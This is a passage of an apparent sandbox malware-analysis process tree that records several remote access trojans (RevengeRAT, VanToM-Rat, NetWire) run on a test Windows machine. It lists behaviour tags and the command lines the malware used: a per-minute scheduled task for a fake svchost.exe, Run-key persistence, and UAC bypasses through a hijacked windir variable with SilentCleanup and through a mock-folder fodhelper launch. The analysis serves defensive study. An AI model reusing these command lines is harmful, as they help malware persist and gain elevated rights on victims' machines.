                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:2680
                                                                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\xnd4mtiq.cmdline"
                                                                                          4⤵
                                                                                            PID:3456
                                                                                            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                              C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC087.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc6F309118C37C4C498AD9EE851292471.TMP"
                                                                                              5⤵
                                                                                                PID:3004
                                                                                            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                              "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\kvteexqs.cmdline"
                                                                                              4⤵
                                                                                                PID:4192
                                                                                                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                  C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC114.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcBFA9A660F0134FE9A4F4388C1CE2876A.TMP"
                                                                                                  5⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:3604
                                                                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ehz6fwxm.cmdline"
                                                                                                4⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:4592
                                                                                                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                  C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC181.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc6B2FF6F420274A0E9F8F4AD9A73ADE2.TMP"
                                                                                                  5⤵
                                                                                                    PID:3220
                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
                                                                                                  4⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:1536
                                                                                                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                    5⤵
                                                                                                    • Drops startup file
                                                                                                    • Adds Run key to start application
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • NTFS ADS
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2160
                                                                                                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                      6⤵
                                                                                                        PID:4020
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /create /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
                                                                                                        6⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:376
                                                                                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ugff_eai.cmdline"
                                                                                                        6⤵
                                                                                                          PID:1200
                                                                                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES687F.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc3D04EAA8E0944B11BC3BEEBB7FD2A10.TMP"
                                                                                                            7⤵
                                                                                                              PID:216
                                                                                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\olkbz3ws.cmdline"
                                                                                                            6⤵
                                                                                                              PID:2300
                                                                                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES69B8.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFEF565DBA925443F8F4F91FB4CB77226.TMP"
                                                                                                                7⤵
                                                                                                                  PID:2400
                                                                                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\kl38z1h4.cmdline"
                                                                                                                6⤵
                                                                                                                  PID:3932
                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                    C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6AB2.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD1FA0359F9FF462F91A0B3B94E38ADE5.TMP"
                                                                                                                    7⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:1876
                                                                                                                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\lfipljnb.cmdline"
                                                                                                                  6⤵
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:2616
                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                    C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6B1F.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc16669CB02C764CDCA05E833DB3BAA434.TMP"
                                                                                                                    7⤵
                                                                                                                      PID:804
                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\hfpw_zgx.cmdline"
                                                                                                                    6⤵
                                                                                                                      PID:4720
                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6B9C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA388D21E8D614F99B63EB97FBCC1938E.TMP"
                                                                                                                        7⤵
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:1508
                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\p8bsyy9y.cmdline"
                                                                                                                      6⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:4736
                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6C19.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc95F89F9B3BF343398EF09EB34DA11068.TMP"
                                                                                                                        7⤵
                                                                                                                          PID:4464
                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\xuf0c859.cmdline"
                                                                                                                        6⤵
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:1676
                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6CA6.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF38A44F9939A427FA3929140972DB55.TMP"
                                                                                                                          7⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:2300
                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\7pjpm7vb.cmdline"
                                                                                                                        6⤵
                                                                                                                          PID:1200
                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D13.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD8DDEDB472C45CFBBFDBA674BE753F.TMP"
                                                                                                                            7⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:708
                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\etwjm3wf.cmdline"
                                                                                                                          6⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:3980
                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D80.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc40AF6D5EE7624D989FA65DC589DD4C4E.TMP"
                                                                                                                            7⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:3068
                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\uxa0gkek.cmdline"
                                                                                                                          6⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:3952
                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6DFD.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc7EF6944BA1484D82B1ECF032369A352C.TMP"
                                                                                                                            7⤵
                                                                                                                              PID:3648
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6520 /prefetch:1
                                                                                                                    2⤵
                                                                                                                      PID:1004
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6536 /prefetch:1
                                                                                                                      2⤵
                                                                                                                        PID:2772
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4644 /prefetch:1
                                                                                                                        2⤵
                                                                                                                          PID:4988
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6472 /prefetch:1
                                                                                                                          2⤵
                                                                                                                            PID:396
                                                                                                                          • C:\Users\Admin\Downloads\RevengeRAT.exe
                                                                                                                            "C:\Users\Admin\Downloads\RevengeRAT.exe"
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:4956
                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                              3⤵
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:3100
                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                                4⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:3752
                                                                                                                          • C:\Users\Admin\Downloads\RevengeRAT.exe
                                                                                                                            "C:\Users\Admin\Downloads\RevengeRAT.exe"
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:4768
                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                              3⤵
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:2092
                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                                4⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:4228
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1
                                                                                                                            2⤵
                                                                                                                              PID:3596
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6544 /prefetch:8
                                                                                                                              2⤵
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              PID:4228
                                                                                                                            • C:\Users\Admin\Downloads\VanToM-Rat.bat
                                                                                                                              "C:\Users\Admin\Downloads\VanToM-Rat.bat"
                                                                                                                              2⤵
                                                                                                                              • Checks computer location settings
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Adds Run key to start application
                                                                                                                              • NTFS ADS
                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                              PID:2500
                                                                                                                              • C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe
                                                                                                                                "C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe"
                                                                                                                                3⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Adds Run key to start application
                                                                                                                                • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                PID:2340
                                                                                                                            • C:\Users\Admin\Downloads\VanToM-Rat.bat
                                                                                                                              "C:\Users\Admin\Downloads\VanToM-Rat.bat"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Adds Run key to start application
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                              PID:4536
                                                                                                                            • C:\Users\Admin\Downloads\VanToM-Rat.bat
                                                                                                                              "C:\Users\Admin\Downloads\VanToM-Rat.bat"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                              PID:3664
                                                                                                                            • C:\Users\Admin\Downloads\VanToM-Rat.bat
                                                                                                                              "C:\Users\Admin\Downloads\VanToM-Rat.bat"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                              PID:400
                                                                                                                            • C:\Users\Admin\Downloads\VanToM-Rat.bat
                                                                                                                              "C:\Users\Admin\Downloads\VanToM-Rat.bat"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                              PID:3000
                                                                                                                            • C:\Users\Admin\Downloads\VanToM-Rat.bat
                                                                                                                              "C:\Users\Admin\Downloads\VanToM-Rat.bat"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                              PID:4400
                                                                                                                            • C:\Users\Admin\Downloads\VanToM-Rat.bat
                                                                                                                              "C:\Users\Admin\Downloads\VanToM-Rat.bat"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                              PID:1888
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6908 /prefetch:2
                                                                                                                              2⤵
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              PID:1620
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
                                                                                                                              2⤵
                                                                                                                                PID:4040
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4812 /prefetch:8
                                                                                                                                2⤵
                                                                                                                                  PID:4320
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
                                                                                                                                  2⤵
                                                                                                                                    PID:2724
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6332 /prefetch:8
                                                                                                                                    2⤵
                                                                                                                                      PID:2500
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4100 /prefetch:8
                                                                                                                                      2⤵
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      PID:4940
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6608 /prefetch:1
                                                                                                                                      2⤵
                                                                                                                                        PID:4948
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6744 /prefetch:1
                                                                                                                                        2⤵
                                                                                                                                          PID:3440
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5108 /prefetch:8
                                                                                                                                          2⤵
                                                                                                                                            PID:3788
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:1
                                                                                                                                            2⤵
                                                                                                                                              PID:4920
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5668 /prefetch:8
                                                                                                                                              2⤵
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              PID:380
                                                                                                                                            • C:\Users\Admin\Downloads\NetWire.exe
                                                                                                                                              "C:\Users\Admin\Downloads\NetWire.exe"
                                                                                                                                              2⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:3980
                                                                                                                                              • C:\Users\Admin\Downloads\NetWire.exe
                                                                                                                                                "C:\Users\Admin\Downloads\NetWire.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Adds Run key to start application
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                PID:1140
                                                                                                                                                • C:\Windows\SysWOW64\Notepad.exe
                                                                                                                                                  C:\Windows\System32\Notepad.exe
                                                                                                                                                  4⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:8132
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Natso.bat" "
                                                                                                                                                    5⤵
                                                                                                                                                      PID:7568
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        reg delete hkcu\Environment /v windir /f
                                                                                                                                                        6⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Modifies registry key
                                                                                                                                                        PID:16092
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
                                                                                                                                                        6⤵
                                                                                                                                                        • Modifies registry key
                                                                                                                                                        PID:7620
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                                                                                                                                                        6⤵
                                                                                                                                                        • Abuse Elevation Control Mechanism: Bypass User Account Control
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:5204
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        reg delete hkcu\Environment /v windir /f
                                                                                                                                                        6⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Modifies registry key
                                                                                                                                                        PID:9552
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Runex.bat" "
                                                                                                                                                      5⤵
                                                                                                                                                        PID:11260
                                                                                                                                                        • C:\Windows \System32\fodhelper.exe
                                                                                                                                                          "C:\Windows \System32\fodhelper.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:7036
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c C:\Users\Public\x.bat
                                                                                                                                                            7⤵
                                                                                                                                                              PID:7192
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                cmd /c C:\Users\Public\x.vbs
                                                                                                                                                                8⤵
                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                • Modifies registry class
                                                                                                                                                                PID:9420
                                                                                                                                                                • C:\Windows\System32\WScript.exe
                                                                                                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Public\x.vbs"
                                                                                                                                                                  9⤵
                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                  PID:5292
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Public\cde.bat" "
